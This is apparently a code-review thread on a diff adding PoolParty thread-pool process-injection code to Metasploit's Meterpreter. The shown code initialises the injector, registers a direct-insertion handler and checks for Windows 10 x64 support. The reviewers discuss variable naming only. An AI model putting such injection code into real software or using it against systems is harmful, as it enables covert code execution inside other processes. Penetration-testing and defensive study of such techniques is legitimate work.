c/meterpreter/source/metsrv/pool_party.c

```diff
@@ -0,0 +1,299 @@
+			//	if (poolLifeguard != NULL) {
+			//		poolLifeguard->variants[POOLPARTY_TECHNIQUE_WORKER_FACTORY_OVERWRITE].isSystemSupported = TRUE;
+			//	}
+			//}
+		}
+	}
+	return ntdll;
+}
+
+POOLPARTY_INJECTOR* GetOrInitPoolParty(DWORD dwSourceArch, DWORD dwDestinationArch) {
+	BOOL bError = FALSE;
+	HANDLE hHeap = GetProcessHeap();
+	bError = (hHeap == NULL);
+	BOOL isWow64;
+	IsWow64Process(GetCurrentProcess(), &isWow64);
+
+	if (poolLifeguard != NULL) {
+		return poolLifeguard;
+	}
+
+	if (!bError) {
+		poolLifeguard = (POOLPARTY_INJECTOR*)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(POOLPARTY_INJECTOR));
+		bError = poolLifeguard == NULL;
+		
+		if(!bError) {
+			poolLifeguard->init = FALSE;
+			if (ntdll == NULL) {
+				bError = GetOrInitNtDll() == NULL;
+			}
+		}
+
+		if (!bError) {
+			if (dwSourceArch == PROCESS_ARCH_X64) {
+				if (dwDestinationArch == PROCESS_ARCH_X64) {
+					// poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_WAIT_INSERTION].isInjectionSupported = poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_WAIT_INSERTION].isSystemSupported;
+				}
+				poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_DIRECT_INSERTION].isInjectionSupported = poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_DIRECT_INSERTION].isSystemSupported;
+			}
+		}
+
+		if (!bError) {
+			poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_DIRECT_INSERTION].handler = remote_tp_direct_insertion;
+			// poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_WAIT_INSERTION].handler = remote_tp_wait_insertion;
+			// poolLifeguard->variants[POOLPARTY_TECHNIQUE_WORKER_FACTORY_OVERWRITE].handler = worker_factory_start_routine_overwrite;
+			poolLifeguard->init = TRUE;
+		}
+	}
+
+	if (bError && poolLifeguard != NULL) {
+		HeapFree(hHeap, 0, poolLifeguard);
+		poolLifeguard = NULL;
+	}
+	return poolLifeguard;
+};
+
+// For now we support only Windows 10 x64 -> Windows 10 x64
+BOOL supports_poolparty_injection(DWORD dwSourceArch, DWORD dwDestinationArch) {
+	OSVERSIONINFO os = { 0 };
+	BOOL isWow64;
+	IsWow64Process(GetCurrentProcess(), &isWow64);
+	os.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
+	NTSTATUS(*pRtlGetVersion)(OSVERSIONINFO * os) = (NTSTATUS(*)(OSVERSIONINFO * os)) GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlGetVersion");
+	dprintf("[INJECT][supports_poolparty_injection] RtlGetVersion: %p", pRtlGetVersion);
+	if (!pRtlGetVersion(&os)) {
+		dprintf("[INJECT][supports_poolparty_injection] dwSourceArch: %d dwDestinationArch: %d isWow64: %d", dwSourceArch, dwDestinationArch, isWow64);
+		dprintf("[INJECT][supports_poolparty_injection] os.dwMajorVersion: %d os.dwMinorVersion: %d", os.dwMajorVersion, os.dwMinorVersion);
+		if (os.dwMajorVersion >= 10) {
+			if (dwDestinationArch == dwSourceArch && dwSourceArch == PROCESS_ARCH_X64) {
+				return TRUE;
+			}
+		}
+	}
+	return FALSE;
+}
+
+HANDLE GetRemoteHandle(HANDLE hProcess, LPCWSTR typeName, DWORD dwDesiredAccess) {
+	HANDLE hHijackHandle = INVALID_HANDLE_VALUE;
+	ULONG dwInformationSizeIn = 2048;
```

Comment:
I'm guessing that the incongruent names and types here are because this is the name of the variable passed to a specific function?  These may be the same size.  I'm too lazy to open up VS and _peek_ right now.

Reply:
Sorry can you re-elaborate, I don't understand.

Reply:
You're using Hungarian notation on the value `dwInformationSize`.  The notation indicates the variable is a `DWORD` but you're instantiating it as a ULONG.  They may both fall into being an unsigned 32-bit depending on compiler and header files- usually to verify I'll right click on the ULONG and see what it is defined as underneath.  With good IDEs, I'm no longer a die-hard fan of Hungarian notation, but mismatching Hungarian variable names with underlying types seems an invitation to future issues.

Reply:
You are right, I should change it to `u64InformationSizeIn` or `qwInformationSizeIn`